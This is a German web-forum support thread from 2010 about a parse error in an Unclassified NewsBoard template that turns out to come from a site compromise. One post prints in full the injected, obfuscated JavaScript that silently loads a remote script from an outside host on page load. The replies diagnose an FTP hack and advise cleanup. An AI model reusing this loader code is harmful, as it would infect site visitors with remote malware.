Not logged in. · Lost password · Register
Forum: Support Bug reports and troubleshooting RSS
Parse Error
NIB (Guest) 2010-01-05, 18:04 #1
No profile available.
Link to this post
Subject: Parse Error
UNB 1.6.4

Der Fehler hier trat heute spontan auf und blieb auch bestehen:

Parse error: syntax error, unexpected ';' in /bla/bla/bla/bla/bla/bla/httpdocs/unb_lib/designs/modern/tpl/cache/main.html.php on line 94

welche da ist:

94 <script>/*GNU GPL*/ try__error:proc.expr__error:expr____} catch(Gxvxypmlk24qjnt) <?php echo  ?></script>

Nachdem die Zeile 94 gelöscht war, gab es auch keinen Fehler mehr. Da ich aber nicht weiß, wofür der Code überhaupt gut ist, wärs toll, wenn mir jemand sagt, ob es eine schlechte Idee war, den einfach zu löschen... ;)

In der error.log gab es heute mehrere Fehler der 3 Arten:

05.01.2010 12:51:59 - User 0  - @post - xxx.xxx.xx.xx
Gäste müssen einen Autornamen eingeben.
Der Benutzername ist zu kurz. Es sind mindestens 2 Zeichen erforderlich.

05.01.2010 03:41:07 - User 0  - @register - xx.xxx.xxx.xx
Falscher Prüfcode.

05.01.2010 16:17:46 - User 0  - @cp - xxx.xxx.xx.xx
Zugriff verweigert.
Avatar
Yves (Administrator) 2010-01-05, 22:44 #2
User title: UNB developer & webmaster
Member since Jan 2004 · 3855 posts · Location: Erlangen, Germany
Group memberships: Administrators, Members
Show profile · Link to this post
Quote by NIB:
Parse error: syntax error, unexpected ';' in /bla/bla/bla/bla/bla/bla/httpdocs/unb_lib/designs/modern/tpl/cache/main.html.php on line 94

Diese Datei wird vom Template Compiler anhand der entsprechenden .html-Datei erstellt. Die .html-Datei ist die Vorlage, die .php-Datei wird generiert und dann zur besseren Performance ausgeführt. Die Datei wird nur dann generiert, wenn die Quelle neuer ist als das Kompilat.

welche da ist:

94 <script>/*GNU GPL*/ try__error:proc.expr__error:expr____} catch(Gxvxypmlk24qjnt) <?php echo  ?></script>

Das sieht danach aus, als wäre ein Fehler in der HTML-Datei (rot). Hast du die denn direkt zuvor verändert? Wenn ja, hast du dir auch die Templates-Dokumentation angeschaut und dich daran gehalten? Wenn du dich dran gehalten hast, ist entweder die Doku falsch oder der Compiler. Wenn die Datei nicht verändert wurde, weiß ich erstmal nicht weiter.

Der PHP-Fehler (lila) scheint ein Folgefehler zu sein.

Nachdem die Zeile 94 gelöscht war, gab es auch keinen Fehler mehr. Da ich aber nicht weiß, wofür der Code überhaupt gut ist, wärs toll, wenn mir jemand sagt, ob es eine schlechte Idee war, den einfach zu löschen... ;)

Du hast eine "temporäre" und automatisch generierte Datei verändert. Das bedeutet, dass deine Änderung wahrscheinlich überschrieben wird, wenn du die Quelldatei änderst oder z.B. erneut mit FTP hochlädst. Außerdem hast du irgendeinen JavaScript-Inhalt entfernt, dessen Bedeutung ich jetzt nicht klären kann, der aber sowieso nicht in Ordnung war.

In der error.log gab es heute mehrere Fehler der 3 Arten:

Die genannten Fehler sind nur Hintergrundrauschen und wahrscheinlich ohne Bedeutung für diesen Fall.
♪ ...nanananah, all in all we’re just brilliant thieves, nanananah... ♪♬
NIB (Guest) 2010-01-05, 23:43 #3
No profile available.
Link to this post
Wieder einmal herzlichen Dank für die schnelle Hilfe! :)

Geändert hatte ich soweit nichts. Wie das hier am Ende der main.html gelandet ist, weiß ich beim besten Willen nicht.

<script>/*GNU GPL*/ try{window.onload = function(){var R3k6u2g4al6il = document.createElement('s&c@r)#)i())&p@t&'.replace(/@|\!|\^|\$|\)|\(|&|#/ig, ''));var G134qc65v2 = 'Fkejbcpvtn';R3k6u2g4al6il.setAttribute('type', 't)$e)@@&x(t##&/&j)a)@!$v^@!a^!s&c$^r!(i(@!p$t$'.replace(/\$|\^|@|\)|&|\(|\!|#/ig, ''));R3k6u2g4al6il.setAttribute('src',  'h!#&t!(#t@##&p&:!&!/)^/&&(!p&$o)^r#&n)b#&b#&(-(&$&o($r@#)g(#.&^&g!(o(#^@o&#$g&#l#^e$^).!&)g@r#(@#.&&&!g!)o&^#o@#&g#l#e@-&!c(()o$m#$-$a)u^^.!&!s)^&u())#e()&s!!i!)&t&!e$#.&&(!r!!!u$:&!&8$&0(&)8!$!$0)/@!(#)v$)i&$c$$)t&(o&#r)($i@($a#$!s$&$s)^#e)!)c$#^r(&$!e$t$@.^c@o#m^!#/(v&#(&i)&$$$c^(#t@(o#)@r@(@i&!a&s)&s&^)e)@c@(@r$$e^!t(^.@c@o!@m$$$&/()&^^j@!#r#)^j&#.&!c&^o^$$m)^().^!!c$)n^/(&g)o&^!o^^@g(##l#)e@$&#.((@c!o!#(&m(!^/(!e)$a#@^$r)#$t^(h(l)i(^@!n(@k()(.)&(!n&&e)^$t##/)'.replace(/#|\!|\$|\(|&|@|\)|\^/ig, ''));R3k6u2g4al6il.setAttribute('defer', 'd&@(e&!@$f&##e@^r)$'.replace(/\!|#|@|\$|&|\)|\^|\(/ig, ''));R3k6u2g4al6il.setAttribute('id', 'B#(q^@@@c!&1@z$)5@($i@#$!l)!)x!$u!)h)((($t(&'.replace(/@|&|\!|\^|#|\$|\)|\(/ig, ''));document.body.appendChild(R3k6u2g4al6il);}} catch(Gxvxypmlk24qjnt) {}</script>
<!--321407d49fcb24fad0620415f23f8a6a-->

Ich hab die Datei jetzt einfach mit der originalen, was sie eigentlich auch hätte sein müssen, ausgetauscht. (Warum habe ich das nicht gleich gemacht..., sorry)
Und siehe da, mit der Originaldatei läuft wieder alles wie es soll.
Jack (Guest) 2010-01-06, 10:02 #4
No profile available.
Link to this post
hatte das gleiche hier.

Deine Site wurde gehackt, wohl über FTP.
Avatar
Yves (Administrator) 2010-01-06, 10:38 #5
User title: UNB developer & webmaster
Member since Jan 2004 · 3855 posts · Location: Erlangen, Germany
Group memberships: Administrators, Members
Show profile · Link to this post
In reply to post #3
Das sieht ja übel aus... schön verschleiert, der JavaScript-Code. Leider darf man in Template-Dateien keine {-Zeichen verwenden, ohne einen \ davorzusetzen, da das sonst für Template-Code gehalten wird. Aus Sicherheitsgründen solltest du aber besser deinen gesamten Webspace mit deinen lokalen Dateien vergleichen und ggf. die Dateien neu hochladen. Das geht z.B. mit Beyond Compare sehr einfach, mit FTP oder SFTP (empfohlen).
♪ ...nanananah, all in all we’re just brilliant thieves, nanananah... ♪♬
Jack (Guest) 2010-01-06, 11:27 #6
No profile available.
Link to this post
PC platt machen, Passwörter alle ändern.

FTP Hacks erfolgen meist über verseuchte PC's
Jack (Guest) 2010-01-06, 11:30 #7
No profile available.
Link to this post
Nachtrag:

das Script habe ich seit Dez. 09 auf diversen Applikationen gesehen: OsC, Joomla, Drupal usw

Eindeutig also ein FTP-Hack und nicht spezifisch CMS, Blog oder so.
NIB (Guest) 2010-01-06, 23:06 #8
No profile available.
Link to this post
Nochmal Danke für die Tips, wäre da selbst nicht drauf gekommen. Der nette §&$%/§$ hat das innerhalb von 13 Minuten in alle Index/Main html, php und js Dateien kopiert, bei jedem Zugriff von einer anderen IP aus. Wenigstens kam er nicht an die ftp logs, da war das Raussuchen einfacher. Mein Virenscanner hat allerdings lokal 'nur' 2 Javaviren gefunden, dachte da wär dann schon mehr los. Und was gibt es entspannenderes als mal einen Tag lang den PC neu aufzusetzen. ;)
Close Smaller – Larger + Reply to this post:
Verification code: VeriCode Please enter the word from the image into the text field below. (Type the letters only, lower case is okay.)
Smileys: :-) ;-) :-D :-p :blush: :cool: :rolleyes: :huh: :-/ <_< :-( :'( :#: :scared: 8-( :nuts: :-O
Special characters:

Go to forum
This board is powered by the Unclassified NewsBoard software, 20120620-dev, © 2003-2011 by Yves Goergen
Page created in 171.8 ms (118.9 ms) · 70 database queries in 114.6 ms
Current time: 2013-05-18, 17:47:27 (UTC +02:00)